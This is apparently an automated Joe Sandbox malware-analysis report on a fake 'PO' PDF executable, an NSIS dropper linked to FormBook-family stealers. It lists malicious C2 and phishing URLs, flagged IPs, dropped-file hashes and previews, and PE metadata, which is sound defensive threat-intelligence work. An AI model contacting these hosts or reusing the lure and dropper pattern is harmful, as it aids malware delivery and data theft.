http://www.uahrbqtj.cfdReferer:	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.canada-reservation.com/sn26/	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.ahevrlh.xyz/sn26/	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.kentuckywalkabout.com/sn26/	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.uedam.xyzReferer:	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.uedam.xyz/sn26/www.1wapws.top	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.qcdrxwr.cfdReferer:	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.1wapws.top/sn26/	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.ownlegalhelp.comReferer:	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.1wapws.top	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.zachmahl.com	explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
188.114.97.7	www.ahevrlh.xyz	European Union	13335	CLOUDFLARENETUS	true
1.1.1.1	happy.zgag-zxxgagugue.com	Australia	13335	CLOUDFLARENETUS	true
35.233.138.132	www.ownlegalhelp.com	United States	15169	GOOGLEUS	false
66.96.162.129	www.bmmboo.com	United States	29873	BIZLAND-SDUS	true
34.102.136.180	4tbbwa.com	United States	15169	GOOGLEUS	false
217.70.184.50	webredir.vip.gandi.net	France	29169	GANDI-ASDomainnameregistrar-httpwwwgandinetFR	false
34.149.87.45	td-ccm-neg-87-45.wixdns.net	United States	2686	ATGS-MMD-ASUS	true
107.148.25.122	www.uahrbqtj.cfd	United States	54600	PEGTECHINCUS	true

General Information

Joe Sandbox Version:	38.0.0 Beryl
Analysis ID:	1295108
Start date and time:	2023-08-22 13:40:14 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10, Office Professional Plus 2016, Chrome 115, Firefox 115, Adobe Reader 23, Java 8 Update 381
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	PO-230821_pdf.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@10/3@9/8
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 64.5% (good quality ratio 60.3%) Quality average: 74.8% Quality standard deviation: 29.9%
HCA Information:	Successful, ratio: 100% Number of executed functions: 87 Number of non-executed functions: 77
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.111.58.202
Excluded domains from analysis (whitelisted): www.bing.com, x1.c.lencr.org, login.live.com, eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, asf-ris-prod-frc-pub.francecentral.cloudapp.azure.com, ris-prod-eudb.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:41:32	API Interceptor	1685x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.7	5QT64dxOzq.exe	Get hash	malicious	LummaC Stealer	Browse	gapi-node.io/c2sock
	PO-384728493049.doc	Get hash	malicious	FormBook	Browse	www.jpxiaoxi.top/oy30/?3ff=LRt97ZM5TFfka9r0iwFyTzgl4AcXQEIUEicMpgfuObYy835r0QR0OisCRas+qB+2Fjwsdw==&AX=lrXPUtAxvVrhsL
	dhl-shipment4820911.exe	Get hash	malicious	FormBook	Browse	www.f7zz1m.cfd/8dnh/?yGMenVEf=eoD3+AdXJtTvCFgXvE7FKo7tKYWmFTq2hYFhZEvqC6GS30FoLwKuMpdo0uhPMput77MkrwtgGAYgceOl7qOjn3rjtvFWLjLtP4tSUek/pUqL&DH-g=BMkjCRb
	Lc3269IMw7.msi	Get hash	malicious	Amadey, LummaC Stealer	Browse	buyerbrand.xyz/c2sock
	Setup.exe	Get hash	malicious	Amadey, LummaC Stealer	Browse	quotamoney.xyz/c2sock
	order_#P23043-WT05.xls	Get hash	malicious	FormBook	Browse	www.fuhouse.link/sy22/?1bw=62EbFCODPcHxLyzWGv3VYgrM/7K+Pku2vqxxkhvdFMvzS/YQ73p/VNmv7S4CBfyyHkuZAA==&4h5H=qfYLujd
	I0ORWC4Kj9.exe	Get hash	malicious	LummaC Stealer	Browse	gapi-node.io/c2sock
	FT0uDS8neB.exe	Get hash	malicious	Unknown	Browse	gstatic-node.io/c2conf
	DHL_AWB_45000289001.exe	Get hash	malicious	FormBook	Browse	www.czjhsklu.click/nnsx/?5zJ7A=Qq1QKV4-cye&19k=RL//gf/vScFATBns9FIQi5KKfwQZT34QZmfKaSAAxjU4wqB/ZGbqe/rMD1h4is7rBcvtUcJo7iNEgRFSJ+Q5lI7d12vMO4CBxqvZnOXr3nPV
	hesaphareketi-01.pdf.exe	Get hash	malicious	FormBook	Browse	www.hlteuo.com/coan/?9iFY=3rvoHpqfxFbJ4Dcm0ZW57fWL6gggnDrIjuE7x9jEjxad9wQC27zoaOZJXu7cud9ZmDdzXpLuQtu+MyqCjjAHlY7uy4d/YHBSpA==&Pu2TM=jVDHj
	sm46NqECwv.exe	Get hash	malicious	FormBook	Browse	www.gtma10.vip/c3bm/?4nxlTg2=krCldiLgjcApKXxrGjhuaKpz6ZHvYhZGq0ZIJRxCzMFoz9nWr9LtpAXVljRcNxh/nVbbku+Fmqa2xbVL9lcLNTxpm3PzxzrMAA==&IM842=K-RervNWusjtX
	udEvgI8oAR.exe	Get hash	malicious	FormBook	Browse	www.jpxiaoxi.top/oy30/?UvLp=LRt97ZM8TCfgatn4gwFyTzgl4AcXQEIUEiEc1jDvK7Yz8GVtzAA4YmUAS/AouR6FOgtc&o0G=AJEx_TCPEV
	jHoKVFIV53.exe	Get hash	malicious	FormBook	Browse	www.gtma10.vip/c3bm/?dGgHTAY=krCldiLgjcApKXxkJhxRa5BznJXscTBGq0ZIJRxCzMFoz9nWr9LtpAXVljRcNxh/nVbbku+Fmqa2xbVL9lcKNRh52DaT/EjyAA==&-HrvQ=N8LIJy_b81rqFVN
	e-dekont.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.annaregas.com/k13s/?xFNH=2R6J1Mwk1pXyKYVwhkNlxjJ8v1RhkSyBe6EME6YyhIZ0/Nga8Zv4MU94dVSKxLe47F9d&zL08lr=ejlHNdbXg
	specifik#U00e1ci#U00f3k.xls	Get hash	malicious	FormBook	Browse	www.grmlfgsz.click/pta7/?Iv=ZUw0DE2tTfMrS/vGyxuieLl6kaDP4oTJFCKtS8euE2iaohDcpFUZC4QpBbwyViCfiPHxoQAr+wVp689ioFi7f5fgi3TjeDS/z8BEKe8=&wDlhgT=ChaYXozdAlwb1SV
	scGanV8c88.exe	Get hash	malicious	FormBook	Browse	www.gtma10.vip/c3bm/?JS_8C7D=krCldiLgjcApKXxrGjhuaKpz6ZHvYhZGq0ZIJRxCzMFoz9nWr9LtpAXVljRcNxh/nVbbku+Fmqa2xbVL9lcLNTxpm3PzxzrMAA==&ivqyHH=ycS5CtM8hGt67IyN
	PAYMENT_DETAILS.xls	Get hash	malicious	FormBook, NSISDropper	Browse	www.guvenilirdamgasi.org/qpcj/?d2Y3o=CLt5b4nVfHN0cUD8LiUhEGsHj/mKirkDBEtfJybA3Pc6UVEGYUZBd7AfTSRLxjGxXde0YLIu/yd5JvFAW8H/jC1EjaCNxooVlWgY9nI=&Rh=DWhbDle
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, SmokeLoader	Browse	gstatic-node.io/c2sock
	vHcolmNDrx.exe	Get hash	malicious	LummaC Stealer	Browse	gstatic-node.io/c2sock
	qhfsVF2oUF.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.emeeycarwash.com/sy22/?l2Md=idWz9iPt5djOAZRx7cnCD/xpUTTFozVhxOaydIDFqIpkj01++CgT1VCwJAO79rhd+nHJ&4hUHW=cVCdVHHX

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
webredir.vip.gandi.net	PAYMENT_DETAILS.xls	Get hash	malicious	FormBook, NSISDropper	Browse	217.70.184.50
	Purchase_Order_August_2023.exe	Get hash	malicious	FormBook, NSISDropper	Browse	217.70.184.50
	Inquiry.exe	Get hash	malicious	FormBook, NSISDropper	Browse	217.70.184.50
	EUR_17,970.25.exe	Get hash	malicious	FormBook, NSISDropper	Browse	217.70.184.50
	Copia_di_pagamento.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	CC_MAIA_T#U00c9CNICApdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	217.70.184.50
	Factura_0104109174pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	217.70.184.50
	368zdBj1O2.exe	Get hash	malicious	FormBook, GuLoader	Browse	217.70.184.50
	payment_confirmation.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	hi38VYWujz.exe	Get hash	malicious	FormBook, GuLoader	Browse	217.70.184.50
	swift_copy.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	Order_32420_03.07.2023.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	BB7978282629227.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	PO.19062023.pdf.exe	Get hash	malicious	FormBook, NSISDropper	Browse	217.70.184.50
	order_z.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	NEW_ORDER89028902.exe	Get hash	malicious	FormBook, GuLoader	Browse	217.70.184.50
	Receipt089838.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	0630OTT231156917.exe	Get hash	malicious	FormBook	Browse	217.70.184.50
	KD_MEDICAL_POLSKA_23053371.exe	Get hash	malicious	FormBook, GuLoader	Browse	217.70.184.50
	s4YvlK74zJ.exe	Get hash	malicious	FormBook, GuLoader	Browse	217.70.184.50

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	5QT64dxOzq.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.7
	OC.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	188.114.96.7
	cotizaci#U00f3n#especificaciones.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	188.114.96.7
	New_Order.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	188.114.97.7
	https://shoutout.wix.com/so/0cOeRzuRM/c?w=Jw_rqQ44rEGfmj9kjQ_k5rk6P-vMl-wAQU1Z_rhRmvY.eyJ1IjoiaHR0cHM6Ly9zbmlwLmx5L3d1OXNwaCIsInIiOiI0ZGM1ZmI5ZS0yYTJjLTQxOGQtYWU4OS1jZmRhZjQ5YjJmMDYiLCJtIjoibWFpbCIsImMiOiIyMWU4NzM1Zi1jMmQ0LTRmZmMtYTcyNi1hNThhM2M5MjNmZWUifQ	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	BOQ_MXN9900.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	188.114.96.7
	https://shoutout.wix.com/so/0cOeRzuRM/c?w=Jw_rqQ44rEGfmj9kjQ_k5rk6P-vMl-wAQU1Z_rhRmvY.eyJ1IjoiaHR0cHM6Ly9zbmlwLmx5L3d1OXNwaCIsInIiOiI0ZGM1ZmI5ZS0yYTJjLTQxOGQtYWU4OS1jZmRhZjQ5YjJmMDYiLCJtIjoibWFpbCIsImMiOiIyMWU4NzM1Zi1jMmQ0LTRmZmMtYTcyNi1hNThhM2M5MjNmZWUifQ	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	http://minimalistbeliever.com/2011/07/	Get hash	malicious	Phisher	Browse	188.114.97.3
	http://email.voxer.com/ls/click?upn=3drcDRR-2FKUxdL77nvlB3YMAhelMokwXt4Foty3wCC-2BmzKaNHjGwyN0icpiPVPr9FGOm8b6PBxJ3enY-2BH6GFVYU905-2FmGtxQWKF7Li6NGbsRV0-2B-2BSnrNjLBTUaZVSSEC3rtkUwG8svouUU0sfIES4N-2FdQ5W-2BVjMslEiDDKMkLUOsIZOCfGS4oewsAc2mMmJk8ukqopv1LUMtxRkDTqfYAhg-3D-3DNLJV_4L9rlx8T0V8eG4q6DdZ-2BcIQ29fJ0bLpyeFKM3rwKsYJkRgSii5ILG6WvsW6tGhMbf2yMsK8Sg1BUwxogMIGQa7U6FTUeW3CeAxAv0YyYXIvs-2FmYvoytVFFohn3rX1ja4Hu31o70vOs4vfKk0dneXuBedD4r2WBuULE52HYolFRbdTW60UF9HvYAd3wfGsvT-2BI-2BFNKweUl57oQJXMumHFag-3D-3D	Get hash	malicious	Unknown	Browse	104.18.16.182
	BL_Draft-00982.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	188.114.96.7
	nyvJgQfx79.html	Get hash	malicious	HTMLPhisher	Browse	104.18.32.137
	Purchase_Order.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	188.114.96.7
	VM_Audio_00min55secs.htm	Get hash	malicious	HTMLPhisher	Browse	104.17.24.14
	https://sagestage.com/wp-includes/fc78400fcaa4d7c1d6b74bcea042842aaa.html#cadfjkd@sdjhfb.com	Get hash	malicious	HTMLPhisher	Browse	172.67.203.232
	https://www.google.com/url?q=https://ozy0387m.page.link/y1E4&source=gmail&ust=1692780778592000&usg=AOvVaw3LbYbRrhrADOSWGQLMn8Mc	Get hash	malicious	Unknown	Browse	1.1.1.1
	QE0NEc0MO7.html	Get hash	malicious	HTMLPhisher	Browse	172.64.155.119
	5890796959.xls	Get hash	malicious	FormBook	Browse	188.114.96.7
	https://x64.nvize.com/l+rphezirhtzypuvotrjp+xi9t/jnql7/z+7a+keuxq1lw==%20x64.nvize.com	Get hash	malicious	Unknown	Browse	1.1.1.1
	m3gf7U2xCn.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader	Browse	104.21.73.191
	https://x64.nvize.com/l+rphezirhtzypuvotrjp+xi9t/jnql7/z+7a+keuxq1lw==%20x64.nvize.com	Get hash	malicious	Unknown	Browse	1.1.1.1

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\cuzsxkdex.k

Download File

Process:	C:\Users\user\Desktop\PO-230821_pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	210040
Entropy (8bit):	7.992284748892841
Encrypted:	true
SSDEEP:	6144:66JOarRiGs9UKrKX5Q6VNL3Jdn214+kYcVs0:66J+GpM+5b93Jd28YcVs0
MD5:	3250F97E1E96B641C92666B35EDEA96A
SHA1:	0D71D6EA9A6DDCF1951C7587AF254F391F39CDB7
SHA-256:	F526904C5247CBD0C20C4346D75F7F97554612CD97C90A918A918644C5835D21
SHA-512:	D396BB8EAC5CEE14D2A521DB42CBDEBF080FC8B75C573105DAE6FA7E8A4FBC14E377CB20051E9A379BFD2487D3F6DEB5799DD44336FE6836E03E5BA6E1F71333
Malicious:	false
Preview:	..,.......8...m.....v..c....9H..v%..m......h..NN.D.%...y0..[.g......g-i.s.5W.B..Wz...""bV....<Mf...I,.1.T.=........o4z..b.ILI.'...dVlFZ......N.j.&...]p....G.'.-l..q.....j.}.6..)Z....m....d.#e...R...\|.^i..a.]E.{...)..".:......-@g.d..]uz~.u...^....?..fY.........k...2..Vi.9....%..m5....h..N..D.%....0..gJ."..(.....'....P..r.{.n.:e.Wy/.....y..zN..=<q.#Z4....o4zGt....~.K{.S...y ...+L..@j}1`jv..8q..`.yT..].%......j.B.\|P.)ZJ...{.....e...R...\|...@!a..`.{...).."0.......-...d.=]u.~.u.L..^....?..fY...ha....k...2....9H..v%..m......h..NN.D.%....0..gJ."..(.....'....P..r.{.n.:e.Wy/.....y..zN..=<q.#Z4....o4zGt....~.K{.S...y ...+L..@j}1`jv..8q..`.yT..].%......j.}.6..)Z.@....{...\|.e...R...\|...@!a..`.{...).."0.......-...d.=]u.~.u.L..^....?..fY...ha....k...2....9H..v%..m......h..NN.D.%....0..gJ."..(.....'....P..r.{.n.:e.Wy/.....y..zN..=<q.#Z4....o4zGt....~.K{.S...y ...+L..@j}1*`jv..8q..`.yT..].%......j.}.6..)Z.@....{...\|.e...R...\|...@!a..`.{...).."

C:\Users\user\AppData\Local\Temp\nsa6B1F.tmp

Download File

Process:	C:\Users\user\Desktop\PO-230821_pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	265544
Entropy (8bit):	7.780542613579891
Encrypted:	false
SSDEEP:	6144:56JOarRiGs9UKrKX5Q6VNL3Jdn214+kYcVsus0ou:56J+GpM+5b93Jd28YcVsusVu
MD5:	3F8E96B0E9FD292B6621A04F342EE445
SHA1:	C18AA269C6628E9AAA10985DBD8D498076AEC49B
SHA-256:	5CCEB238AE0C7F0C722BE7A0300F9BF7811606BB45EBB6E676A6815FDC415538
SHA-512:	7B2743F3D9ABC2878B5FBD18C7760EED257E4ACE16019E5E20DE5BCC2FF94D94AE9148566795DE074F0DE7D1D0129B3E00E2E8EAD4F537A918088CE5E672505E
Malicious:	false
Preview:	........,...................>...............................................................................................................................................................................................................................................................G...................j........................................................................................................................................... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsv6B4F.tmp\hutskogno.dll

Download File

Process:	C:\Users\user\Desktop\PO-230821_pdf.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	47616
Entropy (8bit):	6.306918603125531
Encrypted:	false
SSDEEP:	768:MpS4WFkWFhTdW66YL36jOG7bYtEESAboWV2NKsEBsQyddj5MzxqD1wpz:MpS4U9XbgdKQf56qD1u
MD5:	588CB1A8E7A30760B06E0D17E1D530DA
SHA1:	81C3B8AD80B3EAB1CCA85EFABA50CC06F4FEA922
SHA-256:	0E48E95E34121C2872695725E6BC3A7B266112437733FE9D7F290E72D201F97C
SHA-512:	BB3E2BD8A7F9EE3693C5D777352EFF23C2C4AAF61ADF8954166F6B05D163307C55A33AE06D423C569485B92E51336C09DB62C2393D131AB40B1F21663DC89644
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 67%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........H..)..)..).e....).e....).e....)..)..).]^n..)......)......)......)......).Rich.).........PE..L...z..d...........!.....d...R..........................................................................................F...........................................................................X...@............................................text....c.......d.................. ..`.rdata...'.......(...h..............@..@.data....,..........................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.908366794392515
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	PO-230821_pdf.exe
File size:	260'228 bytes
MD5:	ac43233dd5fe6d55c112660dc700e564
SHA1:	2f431f411c707593f2f4bd67da5db2e9a9593778
SHA256:	d93182b7b2c8633aa7f379efdc80aa778ecc0b59a01929bb10a02cd8349354d2
SHA512:	a3fd81e3d3e4e7271ef1536e8f0c10c945780a916e168bd19bd67e03dd2a326b5910bf528220aa24ccd8799e02b50fbc30e953b3cde2c3d8a2c0dffd0278c770
SSDEEP:	6144:/Ya6lEiLxFG1cz5mqDoGPuduieEJE827qVkF28m4znusYtq4yC:/Y3EUxFzz57Dooudu9A5ko4zusYtFyC
TLSH:	2644121458B0D85FE9F347722E35899D1AE6FA315DE8DA6FD3800E647C36200E92B3E1
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....

File Icon


Icon Hash:	3d2e0f95332b3399

Static PE Info

General

Entrypoint:	0x403640
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	61259b55b8912888e90f516ca08dc514

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 000003F4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [ebp-14h], ebx
mov dword ptr [ebp-04h], 0040A230h
mov dword ptr [ebp-10h], ebx
call dword ptr [004080C8h]
mov esi, dword ptr [004080CCh]
lea eax, dword ptr [ebp-00000140h]
push eax
mov dword ptr [ebp-0000012Ch], ebx
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-28h], ebx
mov dword ptr [ebp-00000140h], 0000011Ch
call esi
test eax, eax
jne 00007F8224EA9B3Ah
lea eax, dword ptr [ebp-00000140h]
mov dword ptr [ebp-00000140h], 00000114h
push eax
call esi
mov ax, word ptr [ebp-0000012Ch]
mov ecx, dword ptr [ebp-00000112h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [ebp-26h], 00000004h
not eax
and eax, ecx
mov word ptr [ebp-2Ch], ax
cmp dword ptr [ebp-0000013Ch], 0Ah
jnc 00007F8224EA9B0Ah
and word ptr [ebp-00000132h], 0000h
mov eax, dword ptr [ebp-00000134h]
movzx ecx, byte ptr [ebp-00000138h]
mov dword ptr [0042A318h], eax
xor eax, eax
mov ah, byte ptr [ebp-0000013Ch]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [ebp-2Ch]
movzx ecx, cx
shl eax, 10h
or eax, ecx

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8504	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3b000	0xca0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6676	0x6800	False	0.6568134014423077	data	6.4174599871908855	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x139a	0x1400	False	0.4498046875	data	5.141066817170598	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x20378	0x600	False	0.509765625	data	4.110582127654237	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2b000	0x10000	0x0	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3b000	0xca0	0xe00	False	0.41908482142857145	data	4.185920130122968	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x3b1d8	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States	0.42473118279569894
RT_DIALOG	0x3b4c0	0x100	data	English	United States	0.5234375
RT_DIALOG	0x3b5c0	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x3b6e0	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x3b740	0x14	data	English	United States	1.2
RT_VERSION	0x3b758	0x208	data	English	United States	0.5288461538461539
RT_MANIFEST	0x3b960	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll	SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll	OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
